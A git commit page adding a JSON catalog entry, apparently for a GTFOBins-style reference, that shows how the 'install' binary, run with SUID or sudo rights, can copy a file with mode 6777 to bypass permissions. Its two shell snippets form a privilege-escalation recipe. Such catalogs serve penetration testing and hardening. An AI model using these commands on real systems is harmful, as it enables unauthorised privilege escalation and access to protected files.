add data source for install

master
Mr. Robot 3 years ago committed by GitHub
parent 13dfb6958e
commit b1ba4b572b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,15 @@
{
"description": "This can be run with elevated privileges to change permissions ('6' denotes the SUID bits) and then read, write, or execute a copy of the file.",
"functions": {
"suid": [
{
"code": "TF=$(mktemp)\n./install -m 6777 [file] $TF\n"
}
],
"sudo": [
{
"code": "TF=$(mktemp)\nsudo install -m 6777 [file] $TF\n"
}
]
}
}
Loading…
Cancel
Save